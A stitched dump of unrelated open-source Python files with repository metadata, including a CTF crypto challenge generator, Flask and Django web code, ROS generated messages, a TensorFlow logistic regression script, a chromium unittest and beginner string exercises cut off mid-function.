    # raised TypeError. The on/off/sleep calls were also wrapped in a print()
    # that emitted a line of Nones; they are now plain statements.
    speed = winds['speed']
    if speed < 15:
        active_led = led2   # green: calm
    elif speed < 21:
        active_led = led    # yellow: breezy
    else:
        active_led = led1   # red: strong wind
    active_led.on()
    sleep(5)
    active_led.off()
    sleep(1)
    print("The wind result is :- ", winds['speed'])
    #print("The humidity result is :- ", humidities)
    #print("The tempreture is :- ", tempreture )
    #print("The pressure is :- ", presh)
    #print("The cloud coverage is :- ", clud)
    # print("The cloud rain volume is :- ", ran)
    #print("The cloud snow volume is :- ", snoww)
Weather_Forecast() | [
"innocent.fiadu@htu.edu.gh"
] | innocent.fiadu@htu.edu.gh |
dc19cf1d9e622a9dee15bf79c56443863a834648 | 860187a5081513d9b4a59260e4ba4e290c4f4638 | /quals/crypto/pqrsen/prob.py | 081cc3cbe2921af8625d14202f080d2196eb5057 | [
"MIT"
] | permissive | fraglantia/CTF-Arkavidia-6 | e0e89315bad16e4f2497aa93ffcc0543256166f6 | 97cc9f5d5fff158db83d9f7a411e7022c94b4b71 | refs/heads/master | 2022-04-01T13:40:26.602541 | 2020-02-14T06:10:01 | 2020-02-14T06:10:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | from Crypto.Util.number import *
from secret import *
# CTF challenge generator: builds an RSA-like instance and writes the public
# parameters plus the ciphertext of the flag.
m = bytes_to_long(flag)
# Two fresh 2048-bit primes; n = p*q is the modulus.
p = getPrime(2048)
q = getPrime(2048)
# r = (p^3)^-1 mod q
r = inverse(pow(p,3),q)
# s = (p^2 - q^e) mod n
s = (pow(p,2,p*q) - pow(q,0x10001,p*q)) % (p*q)
e = 0x10001
n = p*q
assert(m < n)
c = (pow(r*m,e,n)*inverse(s,n))% n
c = pow(c,2,n)
# Write r, s, e, n one per line; 'with' guarantees the handle is flushed and
# closed (the original left the file object dangling).
with open("pub.key", "w") as key_file:
    key_file.writelines(map(lambda x: x + "\n", map(str, [r, s, e, n])))
open("flag.enc","w").write(str(c)) | [
"munirabdullahm@gmail.com"
] | munirabdullahm@gmail.com |
05fb3c8bc1ba86519606a3ecb9ac40cccfed17ac | 2964ced169dd32ecccd9ba37f8cf3b866ec2309b | /apps/sections/models.py | 5d58a7f86874a8ca1ff32779001ada03959a6659 | [] | no_license | GanZiB4Fun/GanZiB-Web | d876de959575967c5f95daa1f561f98ac81b8750 | cdf6f11a91548b167e764adf64e18381da0d1c1e | refs/heads/master | 2021-03-24T13:26:20.344641 | 2018-01-15T11:10:15 | 2018-01-15T11:10:15 | 116,032,699 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/1/2 16:52
# @Author : GanZiB
# @Email : ganzib4fun@163.com
# @Site :
# @File : models.py
# @Software: PyCharm
from flask_sqlalchemy import BaseQuery
from apps import db
class SectionsQuery(BaseQuery):
    """Custom query class attached to Sections (see Sections.query_class)."""
    def getall(self):
        # All Sections rows.
        return self.all()
    def getcategory_id(self, id):
        # Single row by primary key; returns None when absent.
        return self.get(id)
class Sections(db.Model):
    """A chapter/section of a book, keyed by its URL."""
    __tablename__ = 'sections'
    query_class = SectionsQuery
    # NOTE: book_id auto-increments but is NOT the primary key; section_url is.
    book_id = db.Column(db.Integer, db.Sequence('book_id'), autoincrement=True)
    title = db.Column(db.String(255))
    content = db.Column(db.String(255))
    section_order = db.Column(db.Integer())
    section_url = db.Column(db.String(255), primary_key=True)
    book_name = db.Column(db.String(255))
    path = db.Column(db.String(255))
    def __init__(self, *args, **kwargs):
        # Delegates straight to db.Model; kept only for explicitness.
        super(Sections, self).__init__(*args, **kwargs)
    def __repr__(self):
        # NOTE(review): self.name is not a column on this model, so this repr
        # will raise AttributeError when called; it probably should use
        # self.title or self.book_name.
return '<user name %r>' % self.name | [
"ganzib4fun@163.com"
] | ganzib4fun@163.com |
503b7f9f5bea3e416854a4403b9bb08dcf02eee1 | d07a4d928cf5c7e9826d4bd57a4aa70d1bbf9756 | /accounts/views.py | bbf666c3e281c25419c044a945392b7d6e77d7af | [
"MIT"
] | permissive | codexplore-io/django-blog | 8c197cdffd09e1966be715a30de3ff8818ad03d1 | 3305ce98a0baf2ceafdaa66d78088407d93a8258 | refs/heads/master | 2020-05-17T11:05:31.832642 | 2019-04-26T18:29:26 | 2019-04-26T18:29:26 | 183,675,976 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,508 | py | from django.shortcuts import render, redirect
from django.contrib.auth import get_user_model, authenticate, login, logout
from posts.models import Post
User = get_user_model()
# Create your views here.
def user_create_view(request):
    """Register a new user.

    GET renders the signup form. POST checks the two passwords match and that
    neither the username nor the email is taken, creates the user and
    redirects to the post list. On any validation failure the form is
    re-rendered with an 'error' message in the context.
    """
    if request.method != "POST":
        return render(request, 'accounts/create.html')
    context = {}
    password1 = request.POST['password1']
    password2 = request.POST['password2']
    if password1 != password2:
        context['error'] = "Passwords must match!"
        return render(request, 'accounts/create.html', context = context)
    username = request.POST['username']
    email = request.POST['email']
    # Uniqueness checks. NOTE(review): get-then-create is racy under
    # concurrent signups; a DB unique constraint would still protect the
    # table, surfacing as IntegrityError instead of this friendly message.
    try:
        User.objects.get(username = username)
        context['error'] = "Username or email is already in the system!"
        return render(request, 'accounts/create.html', context = context)
    except User.DoesNotExist:
        pass
    try:
        User.objects.get(email = email)
        # BUGFIX: message now matches the username branch ("in the system!");
        # the original said "in system!" here.
        context['error'] = "Username or email is already in the system!"
        return render(request, 'accounts/create.html', context = context)
    except User.DoesNotExist:
        User.objects.create_user(username = username, email = email, password = password1)
        return redirect('posts:list')
def user_login_view(request):
    """Render the login form (GET) or attempt authentication (POST)."""
    if request.method != "POST":
        return render(request, 'accounts/login.html')
    context = {}
    submitted_username = request.POST['username']
    submitted_password = request.POST['password']
    user = authenticate(username=submitted_username, password=submitted_password)
    if user is None:
        context['error'] = "Invalid Login"
    else:
        login(request, user)
        context['success'] = "You are logged in!"
    return render(request, 'accounts/login.html', context)
def user_logout_view(request):
    """Log the current user out; anonymous visitors go to the login page."""
    if not request.user.is_authenticated:
        return redirect('accounts:login')
    logout(request)
    return render(request, 'accounts/logout.html')
def user_profile_view(request, username):
    """Show every post authored by *username*."""
    author = User.objects.get(username=username)
    authored_posts = Post.objects.filter(author=author)
    return render(request, 'accounts/profile.html', context={'posts': authored_posts})
| [
"tannersiciliano@gmail.com"
] | tannersiciliano@gmail.com |
373478a5506e864208ef712885d48dbfca547532 | fd8db5460e29f1e756954bea8b1f19d68f0c46c8 | /gym_subgoal_automata/envs/base/base_env.py | ec4115d0faa1c83b04f0b1e2469f72fa881f5d90 | [
"MIT"
] | permissive | ertsiger/gym-subgoal-automata | 35080daf98bb4ee83381ded02f802f9f48db2005 | 1879a6512441cdf0758c937cc659931d49260d38 | refs/heads/master | 2023-08-24T19:27:21.767022 | 2023-08-15T09:53:08 | 2023-08-15T09:53:08 | 225,397,189 | 7 | 4 | null | 2022-06-21T23:36:27 | 2019-12-02T14:43:02 | Python | UTF-8 | Python | false | false | 984 | py | from abc import ABC, abstractmethod
import gym
from gym_subgoal_automata.utils import utils
class BaseEnv(ABC, gym.Env):
    """Common abstract base class for the package's environments.

    Concrete subclasses implement the gym step/reset/render cycle plus the
    automaton-specific observation accessors declared below.
    """
    # Key under which the RNG seed is looked up in the params dict.
    RANDOM_SEED_FIELD = "environment_seed"
    def __init__(self, params=None):
        super().__init__()
        self.params = params
        self.is_game_over = False
        # NOTE(review): this stores an attribute named 'seed', shadowing the
        # gym.Env.seed() method — confirm no caller relies on the method.
        self.seed = utils.get_param(self.params, BaseEnv.RANDOM_SEED_FIELD)
    @abstractmethod
    def step(self, action):
        pass
    @abstractmethod
    def is_terminal(self):
        pass
    @abstractmethod
    def get_observables(self):
        pass
    @abstractmethod
    def get_restricted_observables(self):
        pass
    @abstractmethod
    def get_observations(self):
        pass
    @abstractmethod
    def get_automaton(self):
        pass
    @abstractmethod
    def reset(self):
        # Concrete resets should call super().reset() to clear the flag.
        self.is_game_over = False
        return None
    @abstractmethod
    def render(self, mode='human'):
        pass
    @abstractmethod
    def play(self):
        pass
| [
"danielfb93@gmail.com"
] | danielfb93@gmail.com |
b77bc2acca6b6e0e86c89938bda7c5ab19c1574c | 7aebfaec6957ad67523f1d8851856af88fb997a6 | /catkin_ws/devel/lib/python2.7/dist-packages/xarm_msgs/srv/_GetAnalogIO.py | 6f4bb532c9a98d105e10d7d82b9913662901a07b | [] | no_license | k-makihara/ROS | 918e79e521999085ab628b6bf27ec28a51a8ab87 | 45b60e0488a5ff1e3d8f1ca09bfd191dbf8c0508 | refs/heads/master | 2023-01-28T06:00:55.943392 | 2020-11-26T05:27:16 | 2020-11-26T05:27:16 | 316,127,707 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,564 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from xarm_msgs/GetAnalogIORequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class GetAnalogIORequest(genpy.Message):
  # genpy-generated service request — regenerate from the .srv definition
  # rather than editing this file by hand.
  _md5sum = "f1c58d245d5dbcbc33afe76f9fc1dff4"
  _type = "xarm_msgs/GetAnalogIORequest"
  _has_header = False #flag to mark the presence of a Header object
  _full_text = """
int16 port_num
"""
  __slots__ = ['port_num']
  _slot_types = ['int16']
  def __init__(self, *args, **kwds):
    """
    Constructor. Any message fields that are implicitly/explicitly
    set to None will be assigned a default value. The recommend
    use is keyword arguments as this is more robust to future message
    changes. You cannot mix in-order arguments and keyword arguments.
    The available fields are:
       port_num
    :param args: complete set of field values, in .msg order
    :param kwds: use keyword arguments corresponding to message field names
    to set specific fields.
    """
    if args or kwds:
      super(GetAnalogIORequest, self).__init__(*args, **kwds)
      #message fields cannot be None, assign default values for those that are
      if self.port_num is None:
        self.port_num = 0
    else:
      self.port_num = 0
  def _get_types(self):
    """
    internal API method
    """
    return self._slot_types
  def serialize(self, buff):
    """
    serialize message into buffer
    :param buff: buffer, ``StringIO``
    """
    try:
      buff.write(_get_struct_h().pack(self.port_num))
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
  def deserialize(self, str):
    """
    unpack serialized message in str into this message instance
    :param str: byte array of serialized message, ``str``
    """
    try:
      end = 0
      start = end
      end += 2
      (self.port_num,) = _get_struct_h().unpack(str[start:end])
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill
  def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    try:
      buff.write(_get_struct_h().pack(self.port_num))
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
  def deserialize_numpy(self, str, numpy):
    """
    unpack serialized message in str into this message instance using numpy for array types
    :param str: byte array of serialized message, ``str``
    :param numpy: numpy python module
    """
    try:
      end = 0
      start = end
      end += 2
      (self.port_num,) = _get_struct_h().unpack(str[start:end])
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill
# Lazily-created, cached struct.Struct instances used by the codecs above.
_struct_I = genpy.struct_I
def _get_struct_I():
    global _struct_I
    return _struct_I
_struct_h = None
def _get_struct_h():
    global _struct_h
    if _struct_h is None:
        _struct_h = struct.Struct("<h")
    return _struct_h
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from xarm_msgs/GetAnalogIOResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class GetAnalogIOResponse(genpy.Message):
_md5sum = "14b69cf7f6c4030ec842bfd1c9d215d0"
_type = "xarm_msgs/GetAnalogIOResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """
float32 analog_value
int16 ret
string message
"""
__slots__ = ['analog_value','ret','message']
_slot_types = ['float32','int16','string']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
analog_value,ret,message
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(GetAnalogIOResponse, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.analog_value is None:
self.analog_value = 0.
if self.ret is None:
self.ret = 0
if self.message is None:
self.message = ''
else:
self.analog_value = 0.
self.ret = 0
self.message = ''
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_fh().pack(_x.analog_value, _x.ret))
_x = self.message
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
_x = self
start = end
end += 6
(_x.analog_value, _x.ret,) = _get_struct_fh().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.message = str[start:end].decode('utf-8')
else:
self.message = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_fh().pack(_x.analog_value, _x.ret))
_x = self.message
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
    """
    unpack serialized message in str into this message instance using numpy for array types
    :param str: byte array of serialized message, ``str``
    :param numpy: numpy python module
    """
    # No array fields in this message: the body mirrors deserialize() and
    # the `numpy` module argument is unused.
    try:
        end = 0
        _x = self
        start = end
        # 6 bytes = float32 analog_value (4) + int16 ret (2).
        end += 6
        (_x.analog_value, _x.ret,) = _get_struct_fh().unpack(str[start:end])
        start = end
        # uint32 length prefix of the message string.
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        start = end
        end += length
        if python3:
            self.message = str[start:end].decode('utf-8')
        else:
            self.message = str[start:end]
        return self
    except struct.error as e:
        raise genpy.DeserializationError(e) #most likely buffer underfill
# Shared Struct for plain uint32 fields (length prefixes), provided by genpy.
_struct_I = genpy.struct_I
def _get_struct_I():
    global _struct_I
    return _struct_I
# Lazily created, cached Struct for the "<fh" layout
# (little-endian float32 + int16) used by GetAnalogIOResponse.
_struct_fh = None
def _get_struct_fh():
    global _struct_fh
    if _struct_fh is None:
        _struct_fh = struct.Struct("<fh")
    return _struct_fh
class GetAnalogIO(object):
    """Generated service container binding the request and response message
    classes for the xarm_msgs/GetAnalogIO service."""
    _type = 'xarm_msgs/GetAnalogIO'
    _md5sum = 'be8d9a2c0ed50c727cbf098654568f97'
    _request_class  = GetAnalogIORequest
    _response_class = GetAnalogIOResponse
| [
"makihara@ms.esys.tsukuba.ac.jp"
] | makihara@ms.esys.tsukuba.ac.jp |
a99c2a5837c537a407dd87963f6047684fc42131 | 60b52f75e2b0712738d5ad2f9c2113e4d8016c1e | /Chapter01/Logistic regression model building/logistic.py | 9173bc687a2a76562df6ba94ab599b0b78764c5a | [
"MIT"
] | permissive | PacktPublishing/Hands-On-Deep-Learning-with-TensorFlow | b63b40140882762841403467f9255612972f7ec7 | c81fdc1edf8f2275ea76a9900c92e7fae0ddf6ed | refs/heads/master | 2023-01-24T19:44:40.191675 | 2023-01-24T11:07:02 | 2023-01-24T11:07:02 | 100,028,897 | 96 | 77 | null | null | null | null | UTF-8 | Python | false | false | 3,308 | py | import tensorflow as tf
# NOTE(review): this file is an IPython session transcript -- the
# `%autoindent` magic below is not valid plain-Python syntax, so the
# script only runs inside IPython.
import numpy as np
%autoindent
try:
    from tqdm import tqdm
except ImportError:
    # Fallback: if tqdm is not installed, make it a no-op pass-through.
    def tqdm(x, *args, **kwargs):
        return x
# Set random seed
np.random.seed(0)
# Load data; arr_0 holds images scaled to [0, 1], arr_1 holds labels.
data = np.load('data_with_labels.npz')
train = data['arr_0']/255.
labels = data['arr_1']
# Look at some data
print(train[0])
print(labels[0])
# If you have matplotlib installed
import matplotlib.pyplot as plt
plt.ion()
# Let's look at a subplot of one of A in each font
# (stride 558 presumably separates the fonts -- TODO confirm dataset layout)
f, plts = plt.subplots(5, sharex=True)
c = 91
for i in range(5):
    plts[i].pcolor(train[c + i * 558],
                   cmap=plt.cm.gray_r)
def to_onehot(labels,nclasses = 5):
'''
Convert labels to "one-hot" format.
>>> a = [0,1,2,3]
>>> to_onehot(a,5)
array([[ 1., 0., 0., 0., 0.],
[ 0., 1., 0., 0., 0.],
[ 0., 0., 1., 0., 0.],
[ 0., 0., 0., 1., 0.]])
'''
outlabels = np.zeros((len(labels),nclasses))
for i,l in enumerate(labels):
outlabels[i,l] = 1
return outlabels
onehot = to_onehot(labels)
# Split data into training and validation (10% held out).
indices = np.random.permutation(train.shape[0])
valid_cnt = int(train.shape[0] * 0.1)
test_idx, training_idx = indices[:valid_cnt],\
        indices[valid_cnt:]
test, train = train[test_idx,:],\
        train[training_idx,:]
onehot_test, onehot_train = onehot[test_idx,:],\
        onehot[training_idx,:]
sess = tf.InteractiveSession()
# These will be inputs
## Input pixels, flattened (36x36 = 1296 per image)
x = tf.placeholder("float", [None, 1296])
## Known labels
y_ = tf.placeholder("float", [None,5])
# Variables: a single softmax-regression layer.
W = tf.Variable(tf.zeros([1296,5]))
b = tf.Variable(tf.zeros([5]))
# Just initialize
sess.run(tf.global_variables_initializer())
# Define model
y = tf.nn.softmax(tf.matmul(x,W) + b)
### End model specification, begin training code
# Climb on cross-entropy
# NOTE(review): `y` is already softmaxed, yet it is fed into
# softmax_cross_entropy_with_logits, which expects raw logits -- this
# applies softmax twice. The 1e-50 term only nudges the values.
cross_entropy = tf.reduce_mean(
        tf.nn.softmax_cross_entropy_with_logits(
        logits = y + 1e-50, labels = y_))
# How we train
train_step = tf.train.GradientDescentOptimizer(
        0.02).minimize(cross_entropy)
# Define accuracy
correct_prediction = tf.equal(tf.argmax(y,1),
        tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(
        correct_prediction, "float"))
# Actually train: full-batch gradient descent, recording accuracy
# every 10th epoch.
epochs = 1000
train_acc = np.zeros(epochs//10)
test_acc = np.zeros(epochs//10)
for i in tqdm(range(epochs)):
    # Record summary data, and the accuracy
    if i % 10 == 0:
        # Check accuracy on train set
        A = accuracy.eval(feed_dict={
            x: train.reshape([-1,1296]),
            y_: onehot_train})
        train_acc[i//10] = A
        # And now the validation set
        A = accuracy.eval(feed_dict={
            x: test.reshape([-1,1296]),
            y_: onehot_test})
        test_acc[i//10] = A
    train_step.run(feed_dict={
        x: train.reshape([-1,1296]),
        y_: onehot_train})
# Notice that accuracy flattens out
print(train_acc[-1])
print(test_acc[-1])
# Plot the accuracy curves
plt.figure(figsize=(6,6))
plt.plot(train_acc,'bo')
plt.plot(test_acc,'rx')
# Look at a subplot of the weights for each font
# (each class's 1296 weights reshaped back to the 36x36 image grid).
f, plts = plt.subplots(5, sharex=True)
for i in range(5):
    plts[i].pcolor(W.eval()[:,i].reshape([36,36]))
| [
"noreply@github.com"
] | noreply@github.com |
123d18a02f05d17059d952a8169d5b7d13b2133e | 61bd4a9dfd606b3c9efd52f23848b7329b18a909 | /Pythonscripts/run_predictions.py | 071dc31901d1c69daae74de43dde6e21c174c466 | [] | no_license | philmcc/aistocks | e9e85dc65e5439793cc5caa4d851a9149ff762a1 | 0706ce7d63db271ee807cc1f6dba8cd178223612 | refs/heads/master | 2021-01-10T05:36:33.736881 | 2016-09-06T13:53:03 | 2016-09-06T13:53:03 | 46,048,154 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,673 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Batch-prediction script: for every stored FANN network, fetch its
# prediction-input rows from MySQL, run the network, and persist the result.
# NOTE(review): Python 2 only -- uses the `print` statement and the
# two-argument `str.translate(None, ...)` form removed in Python 3.
import MySQLdb as mdb
from pyfann import libfann
from datetime import date
from network_functions import save_prediction
mydate = date.today()
con = None
# SECURITY(review): database credentials are hard-coded in source; move
# them to configuration or environment variables.
con = mdb.connect('localhost', 'root',
    'fil1202job', 'stock');
with con:
    cur = con.cursor(mdb.cursors.DictCursor)
    cur1 = con.cursor()
    cur2 = con.cursor()
    #
    # Get a list of all networks
    #
    cur.execute("SELECT a.id, a.group, b.ticker, b.predict_data, a.net_file FROM `network`.`network` a, network.net_group b where a.group = b.id;")
    rows = cur.fetchall()
    for row in rows:
        #
        # For each network get the training data - only most recent data at the moment
        #
        #seldate = "select latest_prediction from network.network where id = " + str(row["id"])
        #cur2.execute(seldate)
        #latestdate = cur2.fetchone()
        #latestdate1 = latestdate[0]
        #print latestdate1
        # NOTE(review): this executes SQL text stored in the database
        # (`predict_data` column) -- trusted-input assumption; confirm.
        cur1.execute(row["predict_data"])
        for row1 in cur1.fetchall():
            #
            # Extract Date (last column of the result row)
            #
            mydate = row1[(len(row1) - 1)]
            row1b = list(row1)
            del row1b[(len(row1b) - 1)]
            #
            # Set up network from its serialized .net file
            #
            ann = libfann.neural_net()
            ann.create_from_file(row["net_file"])
            #
            # Run Prediction
            #
            print ann.run(row1b)
            prediction = ann.run(row1b)
            # Strip the list brackets from the stringified single-output list.
            prediction = str(prediction).translate(None, '[]')
            #
            # Store results in db - Function
            #
            save_prediction(row["id"], mydate, prediction)
| [
"pmcclarence@iparadigms.com"
] | pmcclarence@iparadigms.com |
0f5ed518db714ea344380b6429275fec41ee5e98 | a3d6556180e74af7b555f8d47d3fea55b94bcbda | /chrome/test/webapps/graph_analysis_unittest.py | 8c279f8cf4de227a48180ac060fca8eb86fd07b9 | [
"BSD-3-Clause"
] | permissive | chromium/chromium | aaa9eda10115b50b0616d2f1aed5ef35d1d779d6 | a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c | refs/heads/main | 2023-08-24T00:35:12.585945 | 2023-08-23T22:01:11 | 2023-08-23T22:01:11 | 120,360,765 | 17,408 | 7,102 | BSD-3-Clause | 2023-09-10T23:44:27 | 2018-02-05T20:55:32 | null | UTF-8 | Python | false | false | 4,714 | py | #!/usr/bin/env python3
# Copyright 2021 The Chromium Authors
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import csv
from file_reading import read_actions_file, read_enums_file, read_platform_supported_actions, read_unprocessed_coverage_tests_file
from test_analysis import expand_parameterized_tests, filter_coverage_tests_for_platform, partition_framework_tests_per_platform_combination
from graph_analysis import build_action_node_graph, generate_framework_tests, trim_graph_to_platform_actions
import os
import unittest
from models import ActionNode, CoverageTestsByPlatform, CoverageTestsByPlatformSet, TestPartitionDescription
from models import TestPlatform
TEST_DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"test_data")
class GraphAnalysisUnittest(unittest.TestCase):
    """End-to-end check of the framework-test generation pipeline: parse the
    fixture action/enum/coverage files, generate tests per platform, and
    compare the partitioned output against golden .txt files on disk."""
    def test_test_generation(self):
        self.maxDiff = None
        # Fixture inputs under test_data/.
        actions_filename = os.path.join(TEST_DATA_DIR, "test_actions.md")
        enums_filename = os.path.join(TEST_DATA_DIR, "test_enums.md")
        supported_actions_filename = os.path.join(
            TEST_DATA_DIR, "framework_supported_actions.csv")
        coverage_filename = os.path.join(TEST_DATA_DIR,
                                         "test_unprocessed_coverage.md")
        test_partition = TestPartitionDescription(
            action_name_prefixes=set(),
            browsertest_dir=os.path.join(TEST_DATA_DIR, "expected_test_txt"),
            test_file_prefix="tests_default",
            test_fixture="TestName")
        with open(actions_filename, "r", encoding="utf-8") as actions_file, \
                open(supported_actions_filename, "r", encoding="utf-8") \
                as supported_actions_file, \
                open (enums_filename, "r", encoding="utf-8") as enums, \
                open(coverage_filename, "r", encoding="utf-8") \
                as coverage_file:
            # Parse fixtures into the model objects used by the pipeline.
            enums = read_enums_file(enums.readlines())
            platform_supported_actions = read_platform_supported_actions(
                csv.reader(supported_actions_file, delimiter=','))
            (actions, action_base_name_to_default_param) = read_actions_file(
                actions_file.readlines(), enums, platform_supported_actions)
            required_coverage_tests = read_unprocessed_coverage_tests_file(
                coverage_file.readlines(), actions, enums,
                action_base_name_to_default_param)
            required_coverage_tests = expand_parameterized_tests(
                required_coverage_tests)
            required_coverage_by_platform: CoverageTestsByPlatform = {}
            generated_tests_by_platform: CoverageTestsByPlatform = {}
            # Build, trim, and generate the action graph once per platform.
            for platform in TestPlatform:
                platform_tests = filter_coverage_tests_for_platform(
                    required_coverage_tests.copy(), platform)
                required_coverage_by_platform[platform] = platform_tests
                generated_tests_root_node = ActionNode.CreateRootNode()
                build_action_node_graph(generated_tests_root_node,
                                        platform_tests)
                trim_graph_to_platform_actions(generated_tests_root_node,
                                               platform)
                generated_tests_by_platform[
                    platform] = generate_framework_tests(
                        generated_tests_root_node, platform)
            required_coverage_by_platform_set: CoverageTestsByPlatformSet = (
                partition_framework_tests_per_platform_combination(
                    generated_tests_by_platform))
            # Each platform combination maps to one golden file; a suffix per
            # platform is appended unless the set covers every platform.
            for platform_set, tests in required_coverage_by_platform_set.items(
            ):
                expected_filename = os.path.join(
                    test_partition.browsertest_dir,
                    test_partition.test_file_prefix)
                if len(platform_set) != len(TestPlatform):
                    for platform in TestPlatform:
                        if platform in platform_set:
                            expected_filename += "_" + platform.suffix
                expected_filename += ".txt"
                with open(expected_filename, "r",
                          encoding="utf-8") as expected_tests_file:
                    expected_tests_str = expected_tests_file.read()
                    actual_tests_str = "\n".join([
                        test.generate_browsertest(test_partition)
                        for test in tests
                    ])
                    self.assertEqual(expected_tests_str, actual_tests_str)
# Allow running this unittest module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| [
"chromium-scoped@luci-project-accounts.iam.gserviceaccount.com"
] | chromium-scoped@luci-project-accounts.iam.gserviceaccount.com |
2e897d9ec97d05599a782b93f0e1b52ef8e1ba62 | f9fb4f8073d963c349679e7f40b73dc711160991 | /py-casanova/Lesson2/exo_cc_lesson_2.py | d2dd6e44d1cc887025ca1997ed65bdfb2c64fd21 | [] | no_license | ouedraogoboukary/starter-kit-datascience | 83606196fc19cc3385ba8e846ef3014ff9e0b2e9 | f621d4a1d7826c79c7ebd3a5a07a0138199e6c82 | refs/heads/master | 2020-10-01T01:04:23.460810 | 2017-12-04T22:33:52 | 2017-12-04T22:33:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,621 | py | #! /usr/bin/python3.5
import unittest
# Given a string and a non-negative int n, return a larger string
# that is n copies of the original string.
def string_times(string, n):
    """Return *string* repeated *n* times.

    Returns the sentinel string 'bad argument' when *n* is not an int or
    *string* is not a str (mirrors the original defensive checks).
    """
    if not isinstance(n, int) or not isinstance(string, str):
        return "bad argument"
    return string * n
# Given an array of ints, return True if one of the first 4 elements
# in the array is a 9. The array length may be less than 4.
def array_front9(nums):
    """Return True if a 9 appears among the first four elements of nums."""
    return any(value == 9 for value in nums[:4])
# Given a string, return the count of the number of times
# that a substring length 2 appears in the string and also as
# the last 2 chars of the string, so "hixxxhi" yields 1 (we won't count
# the end substring).
# (i.e. prendre les 2 derniers caractères comme pattern)
""" Rq: non glissant (i.e. sans compter les overlaps)
def last2(string):
count = 0
if(string[-2:] in string[0:-2]):
count += 1
return count
"""
""" Rq: non glissant (i.e. sans compter les overlaps)
def last2(string):
return string[0:-2].count(string[-2:])
"""
""" Glissant """
def last2(string):
    """Count how often the final two-character substring of *string*
    appears earlier in the string (overlaps allowed, the terminal
    occurrence itself excluded)."""
    tail = string[-2:]
    # Candidate windows start at 0 .. len-3, exactly as len(string[:-2]).
    limit = max(len(string) - 2, 0)
    return sum(1 for i in range(limit) if string[i:i + 2] == tail)
# Write a program that maps a list of words into a list of
# integers representing the lengths of the correponding words.
def length_words(array):
    """Map a list of words to the list of their lengths."""
    return [len(word) for word in array]
# write fizbuzz programm
def fizbuzz():
    """Print FizzBuzz lines for 0..99.

    Each qualifying number is printed as `print(i, word)`: 'fizzbuzz'
    for multiples of 15, 'fizz' for other multiples of 3, 'buzz' for
    other multiples of 5.
    """
    for number in range(100):
        by_three = number % 3 == 0
        by_five = number % 5 == 0
        if by_three and by_five:
            print(number, "fizzbuzz")
        elif by_three:
            print(number, "fizz")
        elif by_five:
            print(number, "buzz")
# Write a function that takes a number and returns a list of its digits.
def number2digits(number):
    """Return the decimal digits of a non-negative integer as a list."""
    return list(map(int, str(number)))
# Write function that translates a text to Pig Latin and back.
# English is translated to Pig Latin by taking the first letter of every word,
# moving it to the end of the word and adding 'ay'
def pigLatin(text):
    """Translate *text* to Pig Latin.

    For each space-separated word, the first letter is moved to the end
